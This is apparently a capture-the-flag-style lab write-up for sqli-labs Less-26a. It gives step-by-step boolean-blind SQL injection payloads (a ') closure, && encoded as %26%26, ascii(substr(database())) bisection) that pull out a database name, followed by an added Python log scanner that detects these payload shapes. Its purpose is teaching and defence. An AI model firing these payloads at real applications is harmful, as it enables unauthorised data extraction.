5.26a. Less-26a: GET boolean-based blind injection; in addition to filtering "or" and "and", spaces and comment markers are also filtered; closure is ')
5.26a.1. Manual injection
(1) Determine the injection type and the injection point
?id=2' → error, so this is string-type injection; first try ' as the closure
?id=2'%26%26'1'='1 → returns the id=1 row, so the closure is not '
?id=2')%26%26'1'=('1 → returns the id=2 row, confirming the closure is ')
(2) Guess the length of the database name
No error is echoed back, so error-based injection is unusable; use boolean-based blind injection instead
id=2')&&length(database())=8&&'1'=('1
&& is used in place of the filtered "and"
& must be URL-encoded as %26, otherwise the server splits the query string on it
?id=2')%26%26length(database())=8%26%26'1'=('1
(3) Use ascii() to guess the database name character by character
substr(string, start, length) is the substring function:
string is the string to process
start is the starting position (counted from 1)
length is the number of characters to take
ascii() returns the ASCII code of a character
Uppercase range: 65 (A) to 90 (Z), consecutive with no gaps
Lowercase range: 97 (a) to 122 (z), consecutive with no gaps; uppercase = lowercase - 32
ASCII values of the 26 lowercase letters (uppercase = lowercase - 32):
a 97    h 104   o 111   v 118
b 98    i 105   p 112   w 119
c 99    j 106   q 113   x 120
d 100   k 107   r 114   y 121
e 101   l 108   s 115   z 122
f 102   m 109   t 116
g 103   n 110   u 117
Narrow down the first character by bisection on its ASCII value (normal page = condition true, blank page = condition false):
?id=2')%26%26(ascii(substr(database(),1,1)))>100%26%26'1'=('1 → normal page
?id=2')%26%26(ascii(substr(database(),1,1)))>200%26%26'1'=('1 → blank
?id=2')%26%26(ascii(substr(database(),1,1)))>150%26%26'1'=('1 → blank
?id=2')%26%26(ascii(substr(database(),1,1)))>125%26%26'1'=('1 → blank
?id=2')%26%26(ascii(substr(database(),1,1)))>112%26%26'1'=('1 → normal page
?id=2')%26%26(ascii(substr(database(),1,1)))>120%26%26'1'=('1 → blank
?id=2')%26%26(ascii(substr(database(),1,1)))>116%26%26'1'=('1 → blank
?id=2')%26%26(ascii(substr(database(),1,1)))=115%26%26'1'=('1 → normal page, 1st character of the database name is s
?id=2')%26%26(ascii(substr(database(),2,1)))=101%26%26'1'=('1 → normal page, 2nd character is e
?id=2')%26%26(ascii(substr(database(),3,1)))=99%26%26'1'=('1 → normal page, 3rd character is c
?id=2')%26%26(ascii(substr(database(),4,1)))=117%26%26'1'=('1 → normal page, 4th character is u
?id=2')%26%26(ascii(substr(database(),5,1)))=114%26%26'1'=('1 → normal page, 5th character is r
?id=2')%26%26(ascii(substr(database(),6,1)))=105%26%26'1'=('1 → normal page, 6th character is i
?id=2')%26%26(ascii(substr(database(),7,1)))=116%26%26'1'=('1 → normal page, 7th character is t
?id=2')%26%26(ascii(substr(database(),8,1)))=121%26%26'1'=('1 → normal page, 8th character is y
?id=2')%26%26(ascii(substr(database(),9,1)))=96%26%26'1'=('1 → blank (there is no 9th character)
The database name is security
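The walkthrough above shows why a keyword blocklist on "and", "or", spaces and comment markers does not stop injection: the operators are simply replaced by && and the whole thing is URL-encoded so that %26%26 slips past any check that looks at the raw query string. On the defensive side, the payload shapes are very recognisable once the parameter value is decoded. The following script is an added example (not part of the original write-up or of the sqli-labs project) that URL-decodes the query string of constructed access-log lines and flags the indicators seen above: && or || standing in for and/or, the ') closure followed by an operator, ascii(substr(...)) character probes, length(database()), and the trailing ('1 re-open. The log lines, indicator names and the log format regex are all constructed for this example.

```python
"""Flag boolean-blind SQL injection probes of the shape used in Less-26a
in web access logs. Added example: log lines, indicator names and the
common-log-format pattern are constructed for illustration."""
import re
from urllib.parse import parse_qsl, unquote, urlsplit

# Constructed sample log lines (common log format). The second and third
# requests are the write-up's payloads with ' encoded as %27, & as %26.
LOG_LINES = [
    '10.0.0.5 - - [01/Jan/2024:10:00:00 +0000] "GET /Less-26a/?id=1 HTTP/1.1" 200 512',
    '10.0.0.5 - - [01/Jan/2024:10:00:01 +0000] "GET /Less-26a/?id=2%27)%26%26length(database())=8%26%26%271%27=(%271 HTTP/1.1" 200 512',
    '10.0.0.5 - - [01/Jan/2024:10:00:02 +0000] "GET /Less-26a/?id=2%27)%26%26(ascii(substr(database(),1,1)))%3E100%26%26%271%27=(%271 HTTP/1.1" 200 512',
    '10.0.0.9 - - [01/Jan/2024:10:00:03 +0000] "GET /Less-26a/?id=3 HTTP/1.1" 200 498',
]

# Minimal common-log-format parser (constructed for this example).
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>\S+) (?P<path>\S+) [^"]*" (?P<status>\d{3}) (?P<size>\d+)'
)

# Indicators matched against the *decoded*, lower-cased parameter value.
INDICATORS = {
    # && / || used where the filter blocks the words "and" / "or"
    "logical_operator_substitution": re.compile(r"&&|\|\|"),
    # the ') closure immediately followed by such an operator
    "quote_paren_close": re.compile(r"'\)\s*(?:&&|\|\|)"),
    # character-by-character probe: ascii(substr(...)) / ascii(substring(...))
    "ascii_substr_probe": re.compile(r"ascii\s*\(\s*substr(?:ing)?\s*\("),
    # length(database()) used to size the name before probing it
    "length_of_database": re.compile(r"length\s*\(\s*database\s*\(\s*\)"),
    # value ends by re-opening the quote/paren: ...'1'=('1
    "trailing_reopen": re.compile(r"\('[^']*$"),
}


def normalize(value: str, rounds: int = 3) -> str:
    """URL-decode repeatedly (bounded) so double-encoded payloads are seen."""
    for _ in range(rounds):
        decoded = unquote(value)
        if decoded == value:
            break
        value = decoded
    return value


def decode_query(path: str) -> dict:
    """Return {param: decoded value} for the query string of a request path.
    parse_qsl splits on literal '&' first, so an encoded %26%26 survives
    inside the value and only appears as && after decoding."""
    query = urlsplit(path).query
    return {name: normalize(value) for name, value in parse_qsl(query)}


def classify(value: str) -> list:
    """Return the names of all indicators that fire on one parameter value."""
    lowered = value.lower()
    return [name for name, rx in INDICATORS.items() if rx.search(lowered)]


def parse_log_line(line: str):
    m = LOG_RE.match(line)
    return m.groupdict() if m else None


def scan(lines) -> list:
    """Return one finding per request whose parameters trip any indicator."""
    findings = []
    for line in lines:
        rec = parse_log_line(line)
        if rec is None:
            continue
        for param, value in decode_query(rec["path"]).items():
            hits = classify(value)
            if hits:
                findings.append({"ip": rec["ip"], "param": param,
                                 "value": value, "indicators": hits})
    return findings


if __name__ == "__main__":
    for f in scan(LOG_LINES):
        print(f["ip"], f["param"], f["indicators"], repr(f["value"]))
```

The important design choice is that matching happens on the decoded parameter value, not on the raw URL: a rule looking for the literal string `&&` in the query string misses `%26%26`, which is exactly the encoding step the write-up relies on. Several flagged requests from one source that differ only in the compared number (>100, >200, >150, ...) are the bisection pattern shown above and are worth alerting on as a sequence, not just per request.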